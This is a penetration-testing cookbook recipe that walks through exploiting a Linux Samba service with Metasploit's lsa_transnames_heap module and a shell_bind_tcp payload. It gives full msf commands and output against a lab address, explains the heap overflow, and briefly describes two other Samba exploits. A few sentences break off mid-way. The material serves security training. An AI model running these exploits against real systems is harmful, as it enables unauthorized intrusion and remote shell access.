Linux is also one of the most widely used operating systems after Windows. In the previous few recipes, we saw how we can penetrate a Windows machine by exploiting critical flaws in available services. In this recipe, we will deal with the Linux operating systems. We will be
Getting ready
We will start by scanning our target Linux machine to gather information about the available services. Let us perform a quick Nmap scan and analyze its result:
msf > nmap -sT 192.168.56.101
[*] exec: nmap 192.168.56.101
Starting Nmap 5.20 ( http://nmap.org ) at 2011-11-05 13:35 IST
Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 192.168.56.101
Host is up (0.00048s latency).
Not shown: 997 closed ports PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1)
|_html-title: Index of /
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ )
So now, we have gathered information about the target. Our next step will be to select an exploit and a suitable payload for it.
How to do it...
The process of penetrating into a Linux machine is similar to that of Windows:
1. All we have to focus on is selecting the right exploit and payload. Let us search for any Samba exploit available in the Metasploit directory:
msf > search Samba
2. The previous command will provide a list of various auxiliaries and exploit modules for Samba. We will use the exploit/linux/samba/lsa_transnames_heap module that is listed as a good rank exploit. So, it will have a higher probability of exploiting the target. Let us set the exploit as active and set up the parameters:
msf > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show options
Module options (exploit/linux/samba/lsa_transnames_heap):
Name Current Setting Required Description ---- ---- ---
RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE LSARPC yes The pipe name to use
Exploit target:
Id Name --
0 Linux vsyscall
msf exploit(lsa_transnames_heap) > set RHOST 192.168.56.101 RHOST => 192.168.56.101
msf exploit(lsa_transnames_heap) >
3. Now, our next task is to select a payload. We will have to keep one thing in mind;
as we are targeting a Linux machine, we will have to select a Linux payload for our penetration process. We will be using the linux/x86/shell_bind_tcp payload that works similar to the bind_tcp payload we analyzed in the previous recipes for Windows:
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_
bind_tcp
msf exploit(lsa_transnames_heap) > show options
Module options (exploit/linux/samba/lsa_transnames_heap):
Name Current Setting Required Description ---- ---- ---
RHOST 192.168.56.101 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE LSARPC yes The pipe name to use
Payload options (linux/x86/shell_bind_tcp):
Name Current Setting Required Description ---- ---- --- LPORT 4444 yes The listen port RHOST 192.168.56.101 no The target address.
4. We are all set now and our final step will be to provide the exploit command to begin the process of exploitation:
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler [*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
Upon successful execution of the exploit, we will be provided with shell connectivity with our target machine. The process is very similar to the ones we discussed in previous recipes. The only difference lies in selecting exploits and payloads. The more different combinations of exploits and payloads you try, the better your understanding about it will be.
How it works...
Let us go through a quick note about the service, its exploit, and how it works. Samba is used for printers and file sharing between Linux and Windows machines. This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the talloc chunk overwrite method (credit Ramon and Adriano), which only works with Samba Versions 3.0.21 and 3.0.24. The exploit takes advantage of dynamic memory allocation in heaps. There are
Talloc is a hierarchical memory allocator; every talloc chunk is a potential parent to other talloc chunks. The Samba lsa_io_trans_names Heap Overflow module actually triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the talloc chunk overwrite method, which only works with Samba Versions 3.0.21 and 3.0.24.
Additionally, this module will not work when the Samba log level parameter is higher than 2.
There's more...
Let us cover some more relevant modules related to the Linux operating system.
Other relevant exploit modules for Linux
Apart from the exploit module discussed in this recipe, there are two more modules which deserve some attention. It is highly recommended that you try these exploits manually to understand them better. They are as follows:
f Samba chain:_reply Memory Corruption: This exploit works by corrupting the memory allocated to the response packets in Samba versions prior to 3.3.13. The memory crashes by passing a value larger than the destination buffer size.
f Samba trans2open Overflow: This is a buffer overflow vulnerability existing in Samba Versions 2.2.0 to 2.2.8. It works by exploiting the flaw on x86 Linux machines that do not have the noexec stack option set.